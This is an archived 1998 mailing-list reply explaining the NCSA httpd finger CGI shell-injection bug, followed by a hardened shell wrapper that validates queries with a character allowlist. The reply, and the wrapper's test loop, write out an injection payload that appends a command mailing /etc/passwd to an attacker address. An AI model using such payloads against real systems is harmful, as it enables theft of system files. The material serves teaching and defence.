httpd-dev mailing list archives

From Josh Rotenberg <j...@parasite.com>
Subject Re: Seeking information about old NCSA httpd `finger' bug
Date Mon, 22 Jun 1998 17:43:00 GMT
I don't have the script in front of me, and I don't know of a particular
'incident', but I'm guessing the script doesn't escape characters in the command
it creates, i.e. you type in a query to finger, and the script simply takes it
and executes it in a shell as 'finger whatever@wherever' without checking for, say,
a ';', which would allow you to execute a second command, so if I were to type
'haxor@domain.net; mail haxor@domain< /etc/passwd'

I would end up getting the /etc/passwd file of the machine.

I assume this is what you are looking for ... sorry if I'm explaining stuff you
already know and were looking for something else.

josh



Said Mark-Jason Dominus <mjd@plover.com> on Mon, Jun 22, 1998 at 09:51:27AM -0400:
> Back around 1995 or so there was a problem with a sample application
> distributed with NCSA httpd.  The application was a shell script that
> was supposed to deliver the `finger' service on the web.
> 
> The problem was pretty typical; I think if you put some sort of shell
> metacharacter into the query string, you could get the program to
> execute arbitrary commands.  But I don't remember it exactly.  
> 
> I am going to be giving a talk about security and the WWW, and I
> wanted to discuss this episode.  I've been over the CERT archives and
> I can't find any information about it, and I've even dug up the old
> source code and found the script, but I can't figure out how to
> exercise the bug.
> 
> Is there anyone who remembers this and can remind me of the details?

-- 
josh rotenberg - josh@parasite.com - www.parasite.com
// whatever
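An added example, not the NCSA sample script and not code from either poster: a small POSIX sh wrapper showing the defensive counterpart to the pattern Josh describes. Instead of building a command string and letting a shell parse it, the wrapper validates the query against an allowlist of characters that can legitimately appear in a finger target, rejects anything else (including a leading '-' that finger would read as an option, and embedded newlines), and only then passes the value to finger as a single argument. The function and variable names are hypothetical, and the sample queries in the demonstration loop are constructed for illustration.

```sh
#!/bin/sh
# Hypothetical hardened finger CGI helper (example code, not the NCSA script).
# The original problem: something like `eval "finger $QUERY"` or passing the
# raw query through `sh -c`, where a ';' in the input starts a second command.
# The fix has two parts: validate the input strictly, and never hand it to a
# shell for re-parsing.

# validate_finger_query QUERY
# Returns 0 if QUERY contains only characters acceptable in a finger target
# (letters, digits, '.', '_', '@', '-'), is non-empty, is at most 128 bytes,
# and does not begin with '-'. Returns 1 otherwise.
validate_finger_query() {
    q=$1
    # Refuse empty input rather than running a bare `finger`.
    [ -n "$q" ] || return 1
    # Cap the length so oversized input never reaches argv or the logs.
    [ "${#q}" -le 128 ] || return 1
    # Delete every allowed character; whatever survives is forbidden.
    # The trailing 'x' sentinel stops $(...) from silently stripping a
    # trailing newline, so "user<newline>" is still rejected.
    leftover=$(printf '%s' "$q" | tr -d 'A-Za-z0-9._@-'; printf x)
    [ "$leftover" = "x" ] || return 1
    # A leading '-' would be parsed by finger as an option, not a user name.
    case $q in
        -*) return 1 ;;
    esac
    return 0
}

# safe_finger QUERY
# Emits a CGI response. The query is passed to finger as one quoted argument,
# so the shell never re-parses it; there is no eval and no `sh -c`.
safe_finger() {
    q=$1
    if ! validate_finger_query "$q"; then
        printf 'Status: 400 Bad Request\r\nContent-type: text/plain\r\n\r\n'
        printf 'rejected finger query\n'
        return 1
    fi
    printf 'Content-type: text/plain\r\n\r\n'
    finger "$q"
}

# Demonstration over constructed inputs (the second is the injection shape
# from the thread above; the rest exercise the other rejection paths).
for sample in \
    'user@example.org' \
    'haxor@domain.net; mail haxor@domain< /etc/passwd' \
    '-l' \
    'user@host|id' \
    ''
do
    if validate_finger_query "$sample"; then
        printf 'accept: %s\n' "$sample"
    else
        printf 'reject: %s\n' "$sample"
    fi
done
```

The allowlist is deliberately narrow; if a deployment needs other characters it should add them one at a time with a reason, rather than switching to a denylist of metacharacters, which is exactly what the original script lacked and what tends to miss a case.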
